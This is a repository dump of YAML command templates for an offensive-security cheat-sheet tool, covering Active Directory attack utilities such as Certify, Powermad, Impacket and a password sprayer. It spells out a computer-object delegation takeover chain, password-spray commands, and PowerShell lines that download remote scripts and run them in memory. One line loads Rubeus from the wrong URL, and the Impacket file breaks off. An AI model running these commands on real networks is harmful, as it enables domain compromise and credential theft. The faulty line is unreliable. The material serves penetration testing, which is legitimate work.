├── .vscode └── param.code-snippets ├── LICENSE.md ├── README.md └── commands ├── ADIDNS.yaml ├── ADModule.yaml ├── Certify.yaml ├── Certipy.yaml ├── ComputerObjectTakeOver.yaml ├── Crackmapexec.yaml ├── DomainPasswordSpray.yaml ├── General.yaml ├── Impacket.yaml ├── Inveigh.yaml ├── KrbRelay.yaml ├── KrbRelayUp.yaml ├── MFASweep.yaml ├── Mimikatz.yaml ├── NMAP.yaml ├── NanoDump.yaml ├── NoPac.yaml ├── PPLDump.yaml ├── PPLKiller.yaml ├── PingCastle.yaml ├── PowerUpSQL.yaml ├── PowerView.yaml ├── PrinterBug.yaml ├── PrinterNightmareLPE.yaml ├── PrivExchange.yaml ├── PsExec.yaml ├── RDPHijack.yaml ├── Rubeus.yaml ├── SQL.yaml ├── SauronEye.yaml ├── Seatbelt.yaml ├── SessionGopher.yaml ├── SharPersist.yaml ├── SharpBlock.yaml ├── SharpChrome.yaml ├── SharpClipboard.yaml ├── SharpCloud.yaml ├── SharpCrashEventLog.yaml ├── SharpDPAPI.yaml ├── SharpEDRChecker.yaml ├── SharpFinder.yaml ├── SharpGPOAbuse.yaml ├── SharpHound.yaml ├── SharpMove.yaml ├── SharpRDP.yaml ├── SharpRDPHijack.yaml ├── SharpSCCM.yaml ├── SharpSQL.yaml ├── SharpShares.yaml ├── SharpSniper.yaml ├── SharpSpray.yaml ├── SharpStay.yaml ├── SharpUp.yaml ├── SharpWMI.yaml ├── Snaffler.yaml ├── SspiUacBypass.yaml ├── SweetPotato.yaml ├── WebFinder.yaml ├── WinPEAS.yaml ├── WindowsEnum.yaml ├── files.json ├── nltest.yaml ├── pretender.yaml └── reg.yaml /.vscode/param.code-snippets: -------------------------------------------------------------------------------- 1 | { 2 | // Place your AT_Methodologies workspace snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 3 | // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 4 | // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 5 | // used to trigger the snippet and the body will be expanded and inserted. 
Possible variables are: 6 | // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 7 | // Placeholders with the same ids are connected. 8 | // Example: 9 | // "Print to console": { 10 | // "scope": "javascript,typescript", 11 | // "prefix": "log", 12 | // "body": [ 13 | // "console.log('$1');", 14 | // "$2" 15 | // ], 16 | // "description": "Log output to console" 17 | // } 18 | "DROPS parameter label" : { 19 | "prefix": ["label"], 20 | "body": [ 21 | "- name: ${1:name}", 22 | "\ttype: label" 23 | ], 24 | "description": "Label definition" 25 | }, 26 | "DROPS parameter" : { 27 | "prefix": ["param"], 28 | "body": [ 29 | "- name: ${1:name}", 30 | "\ttype: text", 31 | "\tdescription: ${2:desc}", 32 | "\ttemplate: \"{0}\"", 33 | "\tdefault: ", 34 | "\toptional: false", 35 | ], 36 | "description": "A parameter definition" 37 | }, 38 | "DROPS parameter with options" : { 39 | "prefix": ["param"], 40 | "body": [ 41 | "- name: ${1:name}", 42 | "\tdescription: ", 43 | "\tdefault: ", 44 | "\ttemplate: \"{0}\"", 45 | "\ttype: select", 46 | "\toptions: []", 47 | "\toptional: false\n", 48 | ], 49 | "description": "A parameter definition" 50 | }, 51 | "DROPS flag" : { 52 | "prefix": ["flag"], 53 | "body": [ 54 | "- name: ${1:name}", 55 | "\ttype: flag", 56 | "\tdescription: ${2:desc}", 57 | "\tvalue: ", 58 | "\toptional: true", 59 | "\tselected: false", 60 | ], 61 | "description": "A parameter definition" 62 | }, 63 | "DROPS section" : { 64 | "prefix": ["section"], 65 | "body": [ 66 | "- name: ${1:name}", 67 | "\tlabels: []", 68 | "\tmitre: ''", 69 | "\tverb: ''", 70 | "\trequired_flags: []", 71 | "\toptional_flags: []", 72 | ], 73 | "description": "A section of command" 74 | }, 75 | "DROPS tool" : { 76 | "prefix": ["tool"], 77 | "body": [ 78 | "---", 79 | "projectLink:", 80 | "name:", 81 | "languages:", 82 | "\t- name: ", 83 | "\tprefix: \n", 84 | "params:\n", 85 | "sections:" 86 | ], 87 | "description": "A template for DROPS 
tool yaml" 88 | }, 89 | "Tools node": { 90 | "prefix": ["node"], 91 | "body": [ 92 | "{", 93 | "\t\"id\": \"${1:Name}\",", 94 | "\t\"label\": \"${1:Name}\",", 95 | "\t\"parentId\": \"\",", 96 | "\t\"items\": []", 97 | "}," 98 | ], 99 | "description": "Node definition for tools index json" 100 | }, 101 | "Tools leaf": { 102 | "prefix": ["leaf"], 103 | "body": [ 104 | "{", 105 | "\t\"id\" : \"commands/${1:Label}.yaml\",", 106 | "\t\"label\" : \"${1:Label}\",", 107 | "\t\"tags\" : []", 108 | "}," 109 | ], 110 | "description": "Leaf definition for tools index json" 111 | } 112 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DROPS-Tools 2 | Are you tired of creating and managing your own cheat sheets for the various tools you use in your day-to-day work? Do you find yourself copying, editing, and pasting commands to achieve the desired outcome? 3 | 4 | Introducing [DROPS](https://sygnialabs.github.io/DROPS), a dynamic cheat sheet for CLI tools that saves you time by generating the commands for you, without the need to modify templates from static cheat sheets. With DROPS, you no longer need to remember all the parameters and flags for each individual tool you use, and it even allows you to share the same parameter values across different tools. 5 | 6 | ## About the repository 7 | This repository contains cheat sheet files for each tool reflected in [DROPS](https://sygnialabs.github.io/DROPS), which enables you to add more tools or edit existing ones in this cheat sheet. If you're interested in contributing, please refer to our [Wiki](https://github.com/SygniaLabs/DROPS-Tools/wiki) for a guide on how to do so. 
-------------------------------------------------------------------------------- /commands/ADIDNS.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Kevin-Robertson/Powermad 3 | name: ADIDNS 4 | params: 5 | - name: DNSName 6 | description: Name of new recored that will be created 7 | default: '*' 8 | - name: DNSData 9 | description: Attackers IP 10 | - name: DNSType 11 | description: Type of recored that will be created 12 | default: A 13 | 14 | 15 | sections: 16 | - name: Create new DNS recored (wildcard available) 17 | labels: ["Lateral", "Relaying"] 18 | commands: 19 | - language: PS 20 | command: New-ADIDNSNode -Node {{DNSName}} -Data {{DNSData}} 21 | 22 | - name: Remove existing DNS recored (tombstone before removeing) 23 | labels: ["Lateral", "Relaying"] 24 | commands: 25 | - language: PS 26 | command: Remove-ADIDNSNode -Node {{DNSName}} 27 | 28 | - name: Create a tombstoned recored 29 | labels: ["Lateral", "Relaying"] 30 | commands: 31 | - language: PS 32 | command: New-ADIDNSNode -Node {{DNSName}} -Tombstone 33 | 34 | - name: Enable a tombstoned DNS record 35 | labels: ["Lateral", "Relaying"] 36 | commands: 37 | - language: PS 38 | command: Enable-ADIDNSNode -Node {{DNSName}} 39 | 40 | - name: tombstone a DNS record 41 | labels: ["Lateral", "Relaying"] 42 | commands: 43 | - language: PS 44 | command: Disable-ADIDNSNode -Node {{DNSName}} 45 | 46 | - name: Change DNS recored data 47 | labels: ["Lateral", "Relaying"] 48 | commands: 49 | - language: PS 50 | command: Invoke-DNSUpdate -DNSType {{DNSType}} -DNSName {{DNSName}} -DNSData {{DNSData}} 51 | 52 | - name: Get the owenr of a node 53 | labels: ["Recon"] 54 | commands: 55 | - language: PS 56 | command: Get-ADIDNSNodeOwner -Node {{DNSName}} 57 | 58 | - name: Get the DACL for a DNS node 59 | labels: ["Recon"] 60 | commands: 61 | - language: PS 62 | command: Get-ADIDNSPermission -Node {{DNSName}} 63 | 64 | 
-------------------------------------------------------------------------------- /commands/ADModule.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps 3 | name: AD Module 4 | 5 | params: 6 | - name: Domain 7 | description: Name of the domain to enumerate. 8 | default: example.local 9 | - name: Forest 10 | description: Name of the forest to enumerate. 11 | default: example.local 12 | 13 | sections: 14 | - name: name 15 | labels: ["Recon"] 16 | mitre: "" 17 | commands: 18 | - language: PS 19 | command: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName 20 | 21 | - name: Domain trusts for the current domain 22 | labels: ["Recon"] 23 | mitre: "" 24 | commands: 25 | - language: PS 26 | command: |- 27 | Get-ADTrust 28 | Get-ADTrust –Identity {{Domain}} 29 | 30 | - name: Details about the current forest 31 | labels: ["Recon"] 32 | mitre: '' 33 | commands: 34 | - language: PS 35 | command: |- 36 | Get-ADForest 37 | Get-ADForest –Identity {{Domain}} 38 | 39 | -------------------------------------------------------------------------------- /commands/Certify.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/Certify 3 | name: Certify 4 | languages: 5 | - name: EXE 6 | prefix: Certify.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "Certify" -Arguments " 9 | params: 10 | - name: ca 11 | description: '' 12 | template: "/ca:{0}" 13 | optional: true 14 | selected: false 15 | type: text 16 | default: '' 17 | 18 | - name: domain 19 | description: '' 20 | template: "/domain:{0}" 21 | optional: true 22 | selected: false 23 | type: text 24 | default: '' 25 | 26 | - name: path 27 | description: '' 28 | template: "/path:{0}" 29 | optional: true 30 | selected: false 31 | type: text 32 | default: '' 
33 | 34 | - name: outfile 35 | description: '' 36 | template: "/outfile:{0}" 37 | optional: true 38 | selected: false 39 | type: text 40 | default: '' 41 | 42 | - name: subject 43 | description: '' 44 | template: "/subject:{0}" 45 | optional: true 46 | selected: false 47 | type: text 48 | default: '' 49 | 50 | - name: template 51 | description: '' 52 | template: "/template:{0}" 53 | optional: true 54 | selected: false 55 | type: text 56 | default: '' 57 | 58 | - name: altname 59 | description: '' 60 | template: "/altname:{0}" 61 | optional: true 62 | selected: false 63 | type: text 64 | default: '' 65 | 66 | - name: onbehalfof 67 | description: '' 68 | template: "/onbehalfof:{0}" 69 | optional: true 70 | selected: false 71 | type: text 72 | default: '' 73 | 74 | - name: enrollcert 75 | description: '' 76 | template: "/enrollcert:{0}" 77 | optional: true 78 | selected: false 79 | type: text 80 | default: '' 81 | 82 | - name: enrollcertpw 83 | description: '' 84 | template: "/enrollcertpw:{0}" 85 | optional: true 86 | selected: false 87 | type: text 88 | default: '' 89 | 90 | - name: id 91 | description: '' 92 | template: "/id:{0}" 93 | optional: true 94 | selected: false 95 | type: text 96 | default: '' 97 | 98 | - name: hideAdmins 99 | description: '' 100 | optional: true 101 | selected: false 102 | type: flag 103 | value: '/hideAdmins' 104 | 105 | - name: showAllPermissions 106 | description: '' 107 | optional: true 108 | selected: false 109 | type: flag 110 | value: '/showAllPermissions' 111 | 112 | - name: skipWebServiceChecks 113 | description: '' 114 | optional: true 115 | selected: false 116 | type: flag 117 | value: '/skipWebServiceChecks' 118 | 119 | - name: quiet 120 | description: '' 121 | optional: true 122 | selected: false 123 | type: flag 124 | value: '/quiet' 125 | 126 | - name: vulnerable 127 | description: '' 128 | optional: true 129 | selected: false 130 | type: flag 131 | value: '/vulnerable' 132 | 133 | - name: currentuser 134 | description: '' 
135 | optional: true 136 | selected: false 137 | type: flag 138 | value: '/currentuser' 139 | 140 | - name: enrolleeSuppliesSubject 141 | description: '' 142 | optional: true 143 | selected: false 144 | type: flag 145 | value: '/enrolleeSuppliesSubject' 146 | 147 | - name: clientauth 148 | description: '' 149 | optional: true 150 | selected: false 151 | type: flag 152 | value: '/clientauth' 153 | 154 | - name: json 155 | description: '' 156 | optional: true 157 | selected: false 158 | type: flag 159 | value: '/json' 160 | 161 | - name: showAdmins 162 | description: '' 163 | optional: true 164 | selected: false 165 | type: flag 166 | value: '/showAdmins' 167 | 168 | - name: install 169 | description: '' 170 | optional: true 171 | selected: false 172 | type: flag 173 | value: '/install' 174 | 175 | - name: machine 176 | description: '' 177 | optional: true 178 | selected: false 179 | type: flag 180 | value: '/machine' 181 | 182 | 183 | sections: 184 | 185 | - name: Find information about all registered CAs 186 | labels: [] 187 | mitre: "" 188 | verb: 'cas' 189 | required_flags: [] 190 | optional_flags: ["domain", "ca", "hideAdmins", "showAllPermissions", "skipWebServiceChecks", "quiet"] 191 | 192 | 193 | 194 | - name: Find all enabled certificate templates 195 | labels: [] 196 | mitre: "" 197 | verb: 'find' 198 | required_flags: [] 199 | optional_flags: ["domain", "ca", "quiet"] 200 | 201 | 202 | - name: Find vulnerable/abusable certificate templates using default low-privileged groups 203 | labels: [] 204 | mitre: "" 205 | verb: 'find' 206 | required_flags: ["vulnerable"] 207 | optional_flags: ["domain", "ca", "quiet"] 208 | 209 | 210 | - name: Find vulnerable/abusable certificate templates using all groups the current user context is a part of 211 | labels: [] 212 | mitre: "" 213 | verb: 'find' 214 | required_flags: ["vulnerable", "currentuser"] 215 | optional_flags: ["domain", "quiet"] 216 | 217 | 218 | - name: Find enabled certificate templates where 
ENROLLEE_SUPPLIES_SUBJECT is enabled 219 | labels: [] 220 | mitre: "" 221 | verb: 'find' 222 | required_flags: ["enrolleeSuppliesSubject"] 223 | optional_flags: ["domain", "quiet"] 224 | 225 | 226 | - name: Find enabled certificate templates capable of client authentication 227 | labels: [] 228 | mitre: "" 229 | verb: 'find' 230 | required_flags: ["clientauth"] 231 | optional_flags: ["domain", "quiet"] 232 | 233 | 234 | - name: Find all enabled certificate templates, display all of their permissions, and don't display the banner message 235 | labels: [] 236 | mitre: "" 237 | verb: 'find' 238 | required_flags: ["showAllPermissions", "quiet"] 239 | optional_flags: ["domain"] 240 | 241 | 242 | - name: Find all enabled certificate templates and output to a json file 243 | labels: [] 244 | mitre: "" 245 | verb: 'find' 246 | required_flags: ["json", "outfile"] 247 | optional_flags: ["domain"] 248 | 249 | 250 | 251 | - name: Enumerate access control information for PKI objects 252 | labels: [] 253 | mitre: "" 254 | verb: 'pkiobjects' 255 | required_flags: [] 256 | optional_flags: ["domain", "showAdmins", "quiet"] 257 | 258 | 259 | 260 | - name: Request a new certificate using the current user context 261 | labels: [] 262 | mitre: "" 263 | verb: 'request' 264 | required_flags: ["ca"] 265 | optional_flags: ["subject", "template", "install"] 266 | 267 | 268 | - name: Request a new certificate using the current machine context 269 | labels: [] 270 | mitre: "" 271 | verb: 'request' 272 | required_flags: ["ca", "machine"] 273 | optional_flags: ["subject", "template", "install"] 274 | 275 | 276 | - name: Request a new certificate using the current user context but for an alternate name (if supported) 277 | labels: [] 278 | mitre: "" 279 | verb: 'request' 280 | required_flags: ["ca", "template"] 281 | optional_flags: ["altname"] 282 | 283 | 284 | - name: Request a new certificate on behalf of another user, using an enrollment agent certificate 285 | labels: [] 286 | mitre: "" 287 
| verb: 'request' 288 | required_flags: ["ca","template", "onbehalfof", "enrollcert"] 289 | optional_flags: ["enrollcertpw"] 290 | 291 | 292 | 293 | - name: Download an already requested certificate 294 | labels: [] 295 | mitre: "" 296 | verb: 'download' 297 | required_flags: ["ca", "id"] 298 | optional_flags: ["install", "machine"] 299 | 300 | -------------------------------------------------------------------------------- /commands/Certipy.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/ly4k/Certipy 3 | name: Certipy 4 | languages: 5 | - name: Python 6 | prefix: certipy 7 | 8 | params: 9 | - name: target 10 | description: '[[domain/]username[:password]@]' 11 | template: "{domain}/{username}:{password}@{0}" 12 | optional: false 13 | type: text 14 | default: dc.domain.local 15 | 16 | #authentication options: 17 | - name: Authentication Options 18 | type: label 19 | 20 | - name: hashes 21 | type: text 22 | description: NTLM hashes, format is LMHASH:NTHASH 23 | template: "-hashes {0}" 24 | default: 25 | optional: false 26 | 27 | - name: no-pass 28 | type: flag 29 | description: Don't ask for password (useful for -k) 30 | value: "-no-pass" 31 | optional: true 32 | selected: false 33 | 34 | - name: kerberos 35 | type: flag 36 | description: Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 
37 | value: '-k' 38 | optional: true 39 | selected: false 40 | 41 | 42 | #find options: 43 | - name: Find 44 | type: label 45 | 46 | - name: enabled 47 | type: flag 48 | description: Show only enabled certificate templates 49 | value: "-enabled" 50 | optional: true 51 | selected: true 52 | 53 | #output options: 54 | - name: Output Options 55 | type: label 56 | 57 | - name: debug 58 | type: flag 59 | description: Turn DEBUG output ON 60 | value: '-debug' 61 | optional: true 62 | selected: false 63 | 64 | - name: outputPrefix 65 | type: text 66 | description: Filename prefix for writing results to 67 | template: "-output {0}" 68 | default: "cert-prefix-out" 69 | optional: false 70 | 71 | - name: output 72 | type: text 73 | description: output file name 74 | template: "-out {0}" 75 | default: "out.txt" 76 | optional: false 77 | 78 | - name: json 79 | type: flag 80 | description: Output result as JSON only 81 | value: "-json" 82 | optional: true 83 | selected: false 84 | 85 | - name: bloodhound 86 | type: flag 87 | description: Output result as BloodHound data only 88 | value: "-bloodhound" 89 | optional: true 90 | selected: false 91 | 92 | - name: text 93 | type: flag 94 | description: Output result as text only 95 | value: "-text" 96 | optional: true 97 | selected: false 98 | 99 | 100 | 101 | 102 | #connection options: 103 | - name: Connection Options 104 | type: label 105 | 106 | - name: scheme 107 | type: text 108 | description: LDAP Scheme to query 109 | template: "{0}" 110 | default: "OU=...," 111 | optional: false 112 | 113 | - name: target-ip 114 | type: text 115 | description: IP Address of the target machine. If omitted it will use whatever was specified as target. 
This is useful when target is the NetBIOS name and you cannot resolve it 116 | template: "-target-ip {0}" 117 | default: "192.168.1.1" 118 | optional: true 119 | 120 | - name: ns 121 | type: text 122 | description: Nameserver for DNS resolution 123 | template: "-ns {0}" 124 | default: "ns1.domain.local" 125 | optional: true 126 | 127 | - name: timeout 128 | type: text 129 | description: Timeout for connections in seconds 130 | template: "-timeout {0}" 131 | default: "5" 132 | optional: true 133 | 134 | - name: dc-ip 135 | type: text 136 | description: IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target. 137 | template: "-dc-ip {0}" 138 | default: "" 139 | optional: true 140 | selected: false 141 | 142 | - name: dns-tcp 143 | type: flag 144 | description: Use TCP instead of UDP for DNS queries 145 | value: "-dns-tcp" 146 | optional: true 147 | selected: false 148 | 149 | 150 | 151 | 152 | sections: 153 | - name: Enumerating enabled AD CS certificate templates 154 | labels: [] 155 | mitre: '' 156 | verb: 'find' 157 | required_flags: ["target"] 158 | optional_flags: ["debug", "json", "bloodhound", "text", "outputPrefix", "enabled", "scheme", "dc-ip", "target-ip", "ns", "dns-tcp", "timeout", "hashes", "no-pass", "kerberos"] 159 | -------------------------------------------------------------------------------- /commands/ComputerObjectTakeOver.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | params: 3 | - name: Domain 4 | description: FQDN for the domain 5 | - name: Target Computer 6 | description: Hotname of the target copmuter 7 | - name: Target User 8 | description: Userame for the impersonated account (probably DA) 9 | - name: Fake Computer 10 | description: Hostname for the new fake computer 11 | - name: Fake Copmuter Password 12 | description: Computer password for the new fake computer 13 | - name: PowerMad 14 | description: "Dependency: URI to download PowerMad" 15 
| default: https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1 16 | - name: PowerView 17 | description: "Dependency: URI to download PowerView" 18 | default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 19 | - name: Rubeus 20 | description: "Dependency: URI to download Rubeus" 21 | default: "" 22 | - name: RC4 23 | description: RC4_HMAC result of the fake computer password 24 | sections: 25 | - name: Info 26 | labels: [] 27 | mitre: "" 28 | commands: 29 | - language: Prerequisites 30 | command: |- 31 | 1 - Write privileges over the target computer object 32 | .2 - Permissions to add computer 33 | 3 - At least Windows 2012 DC 34 | - language: Additional 35 | command: |- 36 | 1 - For some reason SMB (after ticket injection) requires session to be elevated 37 | 2 - Powershell remoting does work in low privileged mode 38 | - name: Load dependacies 39 | labels: [] 40 | mitre: "" 41 | commands: 42 | - language: PS 43 | command: |- 44 | IEX (New-Object Net.WebClient).DownloadString('{{PowerMad}}'); 45 | IEX (New-Object Net.WebClient).DownloadString('{{PowerView}}'); 46 | $rubeusb64 = IEX (New-Object Net.WebClient).DownloadString('{{PowerMad}}'); 47 | $RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($rubeusb64)) 48 | - name: Add fake computer 49 | labels: [] 50 | mitre: "" 51 | commands: 52 | - language: PS 53 | command: 54 | New-MachineAccount -MachineAccount {{Fake Computer}} -Password $(ConvertTo-SecureString 55 | '{{Fake Copmuter Password}}' -AsPlainText -Force) -Verbose 56 | - name: Modifying Target Computer's AD Object and get RC4 57 | labels: [] 58 | mitre: "" 59 | commands: 60 | - language: PS 61 | command: |- 62 | $fakesid = Get-DomainComputer {{Fake Computer}} | Select objectsid | Out-String 63 | $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$fakesid)" 64 | $SDBytes = New-Object byte[] 
($SD.BinaryLength) 65 | $SD.GetBinaryForm($SDBytes, 0) 66 | Get-DomainComputer {{Target Computer}} | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose 67 | [Rubeus.Program]::Main("hash /password:{{Fake Copmuter Password}} /user:{{Fake Computer}} /domain:{{Domain}}".Split()) 68 | - name: Execution 69 | labels: [] 70 | mitre: "" 71 | commands: 72 | - language: PS 73 | command: 74 | '[Rubeus.Program]::Main("s4u /user:{{Fake Computer}}$ /rc4:{{RC4}} /impersonateuser:{{Target 75 | User}} /msdsspn:CIFS/{{Target Computer}} /altservice:cifs,host,http /ptt".Split())' 76 | -------------------------------------------------------------------------------- /commands/DomainPasswordSpray.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/dafthack/DomainPasswordSpray 3 | name: DomainPasswordSpray 4 | languages: 5 | - name: PS 6 | prefix: '' 7 | 8 | params: 9 | 10 | - name: Target 11 | type: label 12 | 13 | - name: Domain 14 | type: text 15 | description: The domain to spray against 16 | template: "-Domain {0}" 17 | default: '' 18 | optional: false 19 | 20 | - name: UserList 21 | type: text 22 | description: Optional UserList parameter. 
This will be generated automatically if not specified 23 | template: "-UserList {0}" 24 | default: 'userlist.txt' 25 | optional: true 26 | selected: false 27 | 28 | - name: Filter 29 | type: text 30 | description: Custom LDAP filter for users list fetch 31 | template: "-Filter {0}" 32 | default: '(description=*admin*)' 33 | optional: true 34 | selected: false 35 | 36 | - name: Passwords 37 | type: label 38 | 39 | - name: Password 40 | type: text 41 | description: A single password that will be used to perform the password spray 42 | template: "-Password {0}" 43 | default: 'Winter2022' 44 | optional: true 45 | selected: true 46 | 47 | - name: PasswordList 48 | type: text 49 | description: A list of passwords one per line to use for the password spray (Be very careful not to lockout accounts). 50 | template: "-PasswordList {0}" 51 | default: 'passwords.txt' 52 | optional: true 53 | selected: false 54 | 55 | - name: Throttling 56 | type: label 57 | 58 | - name: Fudge 59 | type: text 60 | description: Extra wait time between each round of tests (seconds) 61 | template: "-Fudge {0}" 62 | default: '60' 63 | optional: true 64 | selectd: false 65 | 66 | - name: Output 67 | type: label 68 | 69 | - name: OutFile 70 | type: text 71 | description: A file to output the results to 72 | template: "-OutFile {0}" 73 | default: 'sprayed-out.txt' 74 | optional: true 75 | selected: false 76 | 77 | - name: Flags 78 | type: label 79 | 80 | - name: UsernameAsPassword 81 | type: flag 82 | description: For each user, will try that user's name as their password 83 | value: '-UsernameAsPassword' 84 | optional: true 85 | selected: false 86 | 87 | - name: Force 88 | type: flag 89 | description: Forces the spray to continue and doesn't prompt for confirmation 90 | value: '-Force' 91 | optional: true 92 | selected: false 93 | 94 | - name: RemoveDisabled 95 | type: flag 96 | description: Attempts to remove disabled accounts from the userlist 97 | value: '-RemoveDisabled' 98 | optional: true 99 | 
selected: false 100 | 101 | - name: RemovePotentialLockouts 102 | type: flag 103 | description: Removes accounts within 1 attempt of locking out 104 | value: '-RemovePotentialLockouts' 105 | optional: true 106 | selected: false 107 | 108 | - name: Quiet 109 | type: flag 110 | description: Less output to work better over C2 111 | value: '-Quiet' 112 | optional: true 113 | selected: false 114 | 115 | sections: 116 | 117 | - name: Gather a userlist from the domain, optionally excluding disabled accounts and accounts that are about to be lockd out 118 | labels: ['Recon'] 119 | mitre: 'T1078.002' 120 | verb: 'Get-DomainUserList' 121 | required_flags: [Domain] 122 | optional_flags: [RemoveDisabled, RemovePotentialLockouts, Filter] 123 | 124 | - name: Generate a list of users from the current user's domain and attempt to authenticate using each username and a specified password 125 | labels: ['Credential Access'] 126 | mitre: 'T1110.003' 127 | verb: 'Invoke-DomainPasswordSpray' 128 | required_flags: [Password] 129 | optional_flags: [PasswordList, Filter, Domain, OutFile, Quiet, Fudge, Force, UsernameAsPassword] 130 | 131 | - name: Iterate over a users list and attempt to authenticate using passwords from a file, one at a time. It will automatically attempt to detect the domain's lockout window and restrict sprays attempts during each window. 
132 | labels: ['Credential Access'] 133 | mitre: 'T1110.003' 134 | verb: 'Invoke-DomainPasswordSpray' 135 | required_flags: [UserList, Domain, PasswordList] 136 | optional_flags: [Filter, OutFile, Quiet, Fudge, Force, UsernameAsPassword] -------------------------------------------------------------------------------- /commands/General.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://lolbas-project.github.io/ 3 | name: LOLBAS 4 | params: 5 | - name: Username 6 | description: Username 7 | default: 8 | - name: GroupName 9 | description: Username 10 | default: 11 | 12 | sections: 13 | - name: Systeminfo 14 | labels: ["Recon", "Local"] 15 | mitre: "T1082" 16 | commands: 17 | - language: Batch 18 | command: |- 19 | systeminfo 20 | hostname 21 | 22 | - name: Hotfixes 23 | labels: ["Recon", "Local"] 24 | mitre: "T1082" 25 | commands: 26 | - language: Batch 27 | command: wmic qfe get Caption,Description,HotFixID,InstalledOn 28 | 29 | - name: Network information 30 | labels: ["Recon", "Local"] 31 | mitre: "" 32 | commands: 33 | - language: Batch 34 | command: |- 35 | ipconfig /all 36 | route print 37 | arp -A 38 | 39 | - name: Local users and groups enumeration 40 | labels: ["Recon", "Local"] 41 | mitre: "" 42 | commands: 43 | - language: Batch 44 | command: |- 45 | net users 46 | net localgroups 47 | net localgroup {{GroupName}} 48 | net user {{Username}} 49 | 50 | - name: Domain users and group enumeration 51 | labels: ["Recon", "LDAP"] 52 | mitre: "" 53 | commands: 54 | - language: Batch 55 | command: |- 56 | net user {{Username}} /domain 57 | net group {{GroupName}} /domain 58 | -------------------------------------------------------------------------------- /commands/Impacket.yaml: -------------------------------------------------------------------------------- 1 | projectLink: https://github.com/SecureAuthCorp/impacket 2 | name: Impacket 3 | languages: 4 | - name: Python 5 | prefix: '' 6 | params: 7 
| - name: domain 8 | description: 'Domain to authenticate to' 9 | template: "{0}" 10 | optional: false 11 | selected: false 12 | type: text 13 | default: domain 14 | 15 | - name: username 16 | description: 'User to authneticate with' 17 | template: "{0}" 18 | optional: false 19 | selected: false 20 | type: text 21 | default: bob 22 | 23 | - name: password 24 | description: 'Password to authenticate with' 25 | template: "{0}" 26 | optional: false 27 | selected: false 28 | type: text 29 | default: 30 | 31 | - name: target 32 | description: '[[domain/]username[:password]@]' 33 | template: "{domain}/{username}:{password}@{0}" 34 | optional: false 35 | selected: false 36 | type: text 37 | default: dc.domain.local 38 | 39 | - name: command 40 | description: 'command to execute at the target. If empty it will launch a semi-interactive shell' 41 | template: "{0}" 42 | optional: true 43 | selected: false 44 | type: text 45 | default: 'whoami' 46 | 47 | - name: share 48 | description: 'Share where the output will be grabbed from (default ADMIN$)' 49 | template: "-share {0}" 50 | optional: true 51 | selected: false 52 | type: text 53 | default: 'ADMIN$' 54 | 55 | 56 | - name: codec 57 | type: text 58 | description: Sets encoding used (codec) from the target's output (default "utf-8") 59 | template: '-codec {0}' 60 | default: "utf-8" 61 | optional: true 62 | selected: false 63 | 64 | 65 | - name: shell-type 66 | type: select 67 | description: choose a command processor for the semi-interactive shell 68 | template: '-shell-type {0}' 69 | options: ['cmd', 'powershell'] 70 | optional: true 71 | 72 | - name: com-version 73 | type: text 74 | description: DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 
5.7 75 | template: '-com-version {0}' 76 | default: '' 77 | optional: true 78 | 79 | 80 | - name: hashes 81 | type: text 82 | description: NTLM hashes, format is LMHASH:NTHASH 83 | template: "-hashes {0}" 84 | default: 85 | optional: false 86 | 87 | 88 | - name: aesKey 89 | type: text 90 | description: AES key to use for Kerberos Authentication (128 or 256 bits) 91 | template: "-aesKey {0}" 92 | default: "" 93 | optional: true 94 | 95 | - name: dc-ip 96 | type: text 97 | description: IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target. 98 | template: "-dc-ip {0}" 99 | default: "" 100 | optional: true 101 | selected: false 102 | 103 | - name: auth-file 104 | type: text 105 | description: Smbclient/mount.cifs-style authentication file 106 | template: "-A {0}" 107 | default: 108 | optional: true 109 | selected: false 110 | 111 | - name: keytab 112 | type: text 113 | description: Read keys for SPN from keytab file 114 | template: "-keytab {0}" 115 | default: "" 116 | optional: true 117 | selected: false 118 | 119 | - name: port 120 | type: text 121 | description: Destination port to connect to SMB Server 122 | template: "-port {0}" 123 | default: "445" 124 | optional: true 125 | selected: false 126 | 127 | 128 | - name: identity 129 | description: '[domain/]username[:password]' 130 | template: "{domain}/{username}:{password}" 131 | optional: false 132 | type: text 133 | default: {username} 134 | 135 | - name: user 136 | type: text 137 | description: Filter output by this user 138 | template: "-user {0}" 139 | default: "filteruser" 140 | optional: true 141 | selected: false 142 | 143 | 144 | - name: users 145 | type: text 146 | description: Input file with list of users to filter to output for 147 | template: "-users {0}" 148 | default: 'users.txt' 149 | optional: true 150 | selected: false 151 | 152 | - name: targets 153 | type: text 154 | description: Input file with targets system to query info from (one per line). 
